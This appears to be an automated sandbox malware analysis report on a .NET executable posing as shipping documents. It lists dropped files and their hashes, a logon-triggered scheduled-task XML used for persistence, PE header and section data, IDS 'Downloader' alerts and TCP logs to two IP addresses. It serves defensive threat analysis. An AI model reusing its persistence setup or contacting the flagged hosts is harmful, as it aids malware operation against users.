Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvhb5fno.l5w.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywurvwk4.dxa.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp

Download File

Process:	C:\Users\user\Desktop\rShippingDocuments240384.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.102468102909105
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZVxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTZrv
MD5:	4E950A5F6C629CEEBC7BD3230A5FB213
SHA1:	0BA036391BEEE7B59E72135DF99A6B7FCD6F41A8
SHA-256:	3A76C611C6D509B32F9849F9EBEB843F2FDBEC77D5230EE1C8D88A7A6F79DFD8
SHA-512:	5EBA4D2E9B70FE34239960A6133127DB34C9032AF3DACB779569AC91EA3C79CC3261055DA13C0B872EF0DCE14D49CF164AC4815BFE17550E608C9E0D1A5339EA
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp329E.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\tdcorV.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.102468102909105
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZVxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTZrv
MD5:	4E950A5F6C629CEEBC7BD3230A5FB213
SHA1:	0BA036391BEEE7B59E72135DF99A6B7FCD6F41A8
SHA-256:	3A76C611C6D509B32F9849F9EBEB843F2FDBEC77D5230EE1C8D88A7A6F79DFD8
SHA-512:	5EBA4D2E9B70FE34239960A6133127DB34C9032AF3DACB779569AC91EA3C79CC3261055DA13C0B872EF0DCE14D49CF164AC4815BFE17550E608C9E0D1A5339EA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\tdcorV.exe

Download File

Process:	C:\Users\user\Desktop\rShippingDocuments240384.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	789504
Entropy (8bit):	7.709204040150524
Encrypted:	false
SSDEEP:	12288:113LrfXYb+9JKV6WpWlCFl2SQ2gkXb4uvzt0FpIrlIK25FBc:nYb+9i11HDIkXb4gztLIDFBc
MD5:	70338F79BB11EE88003EA5F2D0D363C1
SHA1:	85D426E23B7223FAACEA8B78C6DE345098CCFBAD
SHA-256:	50BCB2857CE3D005FAD3479253FA1C7A8CF0CD667C16D9D7C292D9307011DADF
SHA-512:	BACE26ACC95D929C703E437D5ADC360BB54190AAA6F054FF4E77A9BC183BF17603F4A806344DE80538C0669EDE1C5F085BAE9C2A355CBFDBD3CF2D08C2DF8295
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....w...............0.............V!... ...@....@.. ....................................@..................................!..O....@.......................`......(...p............................................ ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................6!......H........u...i......^...@................................................0...........(........(....}.......&........................0............{.....+...0..%..........{.....o....(.......&.r...ps....z.....................0..)...........(......,...(....}......{.......&..............."#.......0..E..........{......o .......{....(......,...(....}.....{........{.......&....*...........>?.......0...........s!......b...%..,...(....rO..p~....("...s#....+\|..o$......o%.......(...+

C:\Users\user\AppData\Roaming\tdcorV.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\rShippingDocuments240384.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.709204040150524
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	rShippingDocuments240384.exe
File size:	789'504 bytes
MD5:	70338f79bb11ee88003ea5f2d0d363c1
SHA1:	85d426e23b7223faacea8b78c6de345098ccfbad
SHA256:	50bcb2857ce3d005fad3479253fa1c7a8cf0cd667c16d9d7c292d9307011dadf
SHA512:	bace26acc95d929c703e437d5adc360bb54190aaa6f054ff4e77a9bc183bf17603f4a806344de80538c0669ede1c5f085bae9c2a355cbfdbd3cf2d08c2df8295
SSDEEP:	12288:113LrfXYb+9JKV6WpWlCFl2SQ2gkXb4uvzt0FpIrlIK25FBc:nYb+9i11HDIkXb4gztLIDFBc
TLSH:	43F4D0D03B3A7319CE79AA749119DD7592F11A64B040FAF269DC3B87318D322AE1CF46
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....w...............0.............V!... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4c2156
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC477B011 [Thu Jun 14 05:03:13 2074 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2102	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x5a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xbfe28	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc015c	0xc0200	e6803fab2eb0f7755123bcca37ff6111	False	0.8736212487800911	data	7.715046701811915	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc4000	0x5a4	0x600	63e4e0c8b6b3926c8428b2c81ffa842e	False	0.419921875	data	4.074954372880226	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc6000	0xc	0x200	8bcb3f7a7ecca127f43825e17e844d9c	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc4090	0x314	data			0.4352791878172589
RT_MANIFEST	0xc43b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-29T10:32:08.859254+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49706	132.226.247.73	80	TCP
2024-10-29T10:32:10.830646+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49706	132.226.247.73	80	TCP
2024-10-29T10:32:11.518744+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49710	188.114.97.3	443	TCP
2024-10-29T10:32:12.520011+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49711	132.226.247.73	80	TCP
2024-10-29T10:32:13.316891+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49713	132.226.247.73	80	TCP
2024-10-29T10:32:14.113780+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49716	132.226.247.73	80	TCP
2024-10-29T10:32:14.975349+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49717	188.114.97.3	443	TCP
2024-10-29T10:32:15.354641+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49713	132.226.247.73	80	TCP
2024-10-29T10:32:16.069816+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49719	188.114.97.3	443	TCP
2024-10-29T10:32:17.004380+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49721	132.226.247.73	80	TCP
2024-10-29T10:32:17.857119+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49723	188.114.97.3	443	TCP
2024-10-29T10:32:18.383817+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49724	188.114.97.3	443	TCP
2024-10-29T10:32:21.165381+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49731	188.114.97.3	443	TCP
2024-10-29T10:32:27.414851+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49745	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 10:32:07.725433111 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:07.731158018 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:07.731230021 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:07.731638908 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:07.737082958 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:08.603444099 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:08.626177073 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:08.858725071 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:08.859142065 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:08.859253883 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:09.117115974 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:09.302000046 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:09.378231049 CET	49708	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:09.378252983 CET	443	49708	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:09.378314972 CET	49708	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:09.393919945 CET	49708	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:09.393933058 CET	443	49708	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:10.000406981 CET	443	49708	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:10.000478983 CET	49708	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:10.005809069 CET	49708	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:10.005821943 CET	443	49708	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:10.006180048 CET	443	49708	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:10.113478899 CET	49708	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:10.159338951 CET	443	49708	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:10.251725912 CET	443	49708	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:10.251787901 CET	443	49708	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:10.251893044 CET	49708	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:10.280356884 CET	49708	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:10.324299097 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:10.329657078 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:10.745311975 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:10.747265100 CET	49710	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:10.747319937 CET	443	49710	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:10.747390032 CET	49710	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:10.747827053 CET	49710	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:10.747843027 CET	443	49710	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:10.830564976 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:10.830646038 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:11.374130011 CET	443	49710	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:11.376379967 CET	49710	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:11.376408100 CET	443	49710	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:11.518707991 CET	443	49710	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:11.518779993 CET	443	49710	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:11.518848896 CET	49710	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:11.519279003 CET	49710	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:11.522583008 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:11.523967028 CET	49711	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:11.528577089 CET	80	49706	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:11.528633118 CET	49706	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:11.529649019 CET	80	49711	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:11.529717922 CET	49711	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:11.529793978 CET	49711	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:11.535264015 CET	80	49711	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:12.019558907 CET	49713	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:12.025157928 CET	80	49713	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:12.029747009 CET	49713	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:12.035482883 CET	49713	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:12.040894985 CET	80	49713	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:12.402126074 CET	80	49711	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:12.403321981 CET	49714	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:12.403372049 CET	443	49714	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:12.403438091 CET	49714	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:12.403723955 CET	49714	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:12.403743029 CET	443	49714	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:12.520010948 CET	49711	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:12.895251036 CET	80	49713	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:12.899035931 CET	49713	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:12.904412031 CET	80	49713	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:13.044210911 CET	443	49714	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:13.045918941 CET	49714	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.045948029 CET	443	49714	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:13.158274889 CET	80	49713	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:13.195178032 CET	443	49714	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:13.195240974 CET	443	49714	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:13.195303917 CET	49714	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.195698023 CET	49714	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.197607994 CET	49715	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.197653055 CET	443	49715	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:13.197792053 CET	49715	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.198771954 CET	49711	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:13.199816942 CET	49716	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:13.202919006 CET	49715	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.202936888 CET	443	49715	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:13.204627991 CET	80	49711	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:13.204691887 CET	49711	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:13.205063105 CET	80	49716	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:13.205126047 CET	49716	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:13.205212116 CET	49716	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:13.210485935 CET	80	49716	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:13.316890955 CET	49713	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:13.817790031 CET	443	49715	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:13.817863941 CET	49715	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.819719076 CET	49715	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.819727898 CET	443	49715	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:13.820023060 CET	443	49715	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:13.863744020 CET	49715	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.881180048 CET	49715	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:13.927334070 CET	443	49715	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:14.017729044 CET	443	49715	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:14.017802954 CET	443	49715	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:14.017870903 CET	49715	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:14.067023993 CET	49715	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:14.071921110 CET	80	49716	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:14.113780022 CET	49716	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:14.233612061 CET	49717	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:14.233658075 CET	443	49717	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:14.233897924 CET	49717	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:14.237720013 CET	49717	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:14.237736940 CET	443	49717	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:14.834331036 CET	443	49717	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:14.837059021 CET	49717	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:14.837084055 CET	443	49717	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:14.860534906 CET	49713	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:14.865936995 CET	80	49713	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:14.975346088 CET	443	49717	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:14.975399017 CET	443	49717	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:14.975462914 CET	49717	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:14.975944042 CET	49717	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:14.982130051 CET	49718	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:14.988063097 CET	80	49718	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:14.988123894 CET	49718	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:14.988234997 CET	49718	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:14.993748903 CET	80	49718	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:15.308631897 CET	80	49713	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:15.311156034 CET	49719	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:15.311192036 CET	443	49719	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:15.311248064 CET	49719	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:15.311711073 CET	49719	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:15.311726093 CET	443	49719	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:15.354543924 CET	80	49713	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:15.354640961 CET	49713	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:15.869275093 CET	80	49718	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:15.870763063 CET	49720	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:15.870791912 CET	443	49720	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:15.870887041 CET	49720	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:15.871149063 CET	49720	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:15.871161938 CET	443	49720	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:15.910634041 CET	49718	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:15.926806927 CET	443	49719	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:15.928563118 CET	49719	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:15.928585052 CET	443	49719	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:16.069792986 CET	443	49719	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:16.069848061 CET	443	49719	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:16.069921970 CET	49719	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:16.070491076 CET	49719	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:16.075690985 CET	49713	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:16.077843904 CET	49721	80	192.168.2.8	132.226.247.73
